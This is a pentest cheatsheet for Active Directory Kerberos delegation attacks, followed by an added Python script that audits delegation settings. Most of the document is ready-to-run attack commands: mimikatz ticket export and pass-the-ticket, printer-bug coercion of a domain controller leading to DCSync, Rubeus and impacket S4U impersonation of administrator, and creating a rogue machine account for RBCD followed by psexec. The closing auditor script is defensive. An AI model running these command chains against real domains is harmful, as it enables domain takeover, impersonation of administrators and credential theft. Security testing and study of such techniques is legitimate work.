Unconstrained Delegation

A host configured for unconstrained delegation caches the TGTs of every user who authenticates to it. Compromise the host → the cached TGTs can be extracted from memory.

Find

Get-ADComputer -Filter {TrustedForDelegation -eq $true}
Get-DomainComputer -Unconstrained
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" -D "user@domain.local" -w 'pass' "(userAccountControl:1.2.840.113556.1.4.803:=524288)" sAMAccountName

Exploit

# On compromised host with unconstrained delegation
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt ticket.kirbi

Printer Bug (Coerce DC)

Force the DC to authenticate to the unconstrained delegation host (the DC's TGT then lands in that host's memory):
.\SpoolSample.exe DC_HOSTNAME COMPROMISED_HOSTNAME
# Catch TGT
mimikatz # sekurlsa::tickets /export
# Use DC TGT for DCSync

Constrained Delegation

The account can impersonate users, but only to the specific services listed in its msDS-AllowedToDelegateTo attribute.

Find

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(msDS-AllowedToDelegateTo=*)" sAMAccountName msDS-AllowedToDelegateTo

Exploit — Rubeus

.\Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt

Exploit — Impacket

impacket-getST -spn cifs/target.domain.local -impersonate administrator DOMAIN/svc_account:password -dc-ip DC_IP
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@target.domain.local -k -no-pass

With Hash

impacket-getST -spn cifs/target.domain.local -impersonate administrator DOMAIN/svc_account -hashes :NTLM_HASH -dc-ip DC_IP

Resource-Based Constrained Delegation (RBCD)

Write msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object. Requirements: write access to the target computer object, plus the ability to create a machine account.

Check MAQ (Machine Account Quota)

crackmapexec ldap DC_IP -u user -p pass -M maq

Create Machine Account

impacket-addcomputer DOMAIN/user:password -computer-name 'EVIL$' -computer-pass 'Password123' -dc-ip DC_IP

Set Delegation

impacket-rbcd DOMAIN/user:password -delegate-from 'EVIL$' -delegate-to 'TARGET$' -dc-ip DC_IP -action write

Get Ticket

impacket-getST -spn cifs/target.domain.local -impersonate administrator DOMAIN/'EVIL$':'Password123' -dc-ip DC_IP
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@target -k -no-pass

Quick Reference

Type          | Find                        | Exploit
Unconstrained | TrustedForDelegation        | Steal TGTs from memory
Constrained   | msDS-AllowedToDelegateTo    | S4U2Self + S4U2Proxy
RBCD          | Write to computer object    | Create machine + rbcd + getST
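As an added audit example (not part of the original cheatsheet), the classifier below reads the same attributes the Find sections query (userAccountControl bits, msDS-AllowedToDelegateTo, msDS-AllowedToActOnBehalfOfOtherIdentity) and reports which delegation type each account carries, plus whether an account is shielded from delegation by the NOT_DELEGATED flag or Protected Users membership. Domain controllers are skipped for the unconstrained check because they hold that flag by design; the sample records are constructed inline, and the function and record names are this example's own.

```python
# Added example: classify AD delegation settings from LDAP attribute values.
# Runs offline over constructed sample records; feed it the attributes returned
# by the ldapsearch / Get-DomainComputer queries above for a real audit.

# userAccountControl bit flags (values as documented by Microsoft)
TRUSTED_FOR_DELEGATION = 0x80000            # 524288: unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # 16777216: constrained with protocol transition
NOT_DELEGATED = 0x100000                    # 1048576: "account is sensitive and cannot be delegated"
SERVER_TRUST_ACCOUNT = 0x2000               # 8192: domain controller (unconstrained is expected there)


def classify_delegation(entry):
    """Return the delegation findings for one LDAP entry (dict of attribute -> value)."""
    uac = int(entry.get("userAccountControl", 0))
    findings = []
    if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
        findings.append("unconstrained")
    if entry.get("msDS-AllowedToDelegateTo"):
        has_pt = bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION)
        findings.append("constrained+protocol-transition" if has_pt else "constrained")
    if entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("rbcd-target")
    return findings


def is_delegation_protected(entry):
    """True when the account cannot be delegated: NOT_DELEGATED set or Protected Users member."""
    uac = int(entry.get("userAccountControl", 0))
    groups = entry.get("memberOf", [])
    return bool(uac & NOT_DELEGATED) or any("CN=Protected Users" in g for g in groups)


def audit(entries):
    """Map sAMAccountName -> findings for every entry with some delegation configured."""
    return {e["sAMAccountName"]: f for e in entries if (f := classify_delegation(e))}


# Constructed sample data (hypothetical accounts, not from any real domain)
SAMPLE_ENTRIES = [
    {"sAMAccountName": "DC01$", "userAccountControl": 532480},     # SERVER_TRUST | TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "WEB01$", "userAccountControl": 528384},    # WORKSTATION_TRUST | TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "svc_sql", "userAccountControl": 16843264,  # NORMAL | DONT_EXPIRE | TRUSTED_TO_AUTH
     "msDS-AllowedToDelegateTo": ["cifs/target.domain.local"]},
    {"sAMAccountName": "TARGET$", "userAccountControl": 4096,      # WORKSTATION_TRUST, RBCD descriptor set
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},  # constructed, truncated SD header
    {"sAMAccountName": "administrator", "userAccountControl": 1049088,  # NORMAL | NOT_DELEGATED
     "memberOf": ["CN=Protected Users,CN=Users,DC=domain,DC=local"]},
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_ENTRIES).items():
        print(f"{name}: {', '.join(findings)}")
```

Each reported account maps to a row of the Quick Reference table, which makes the output a direct checklist for review of delegation settings.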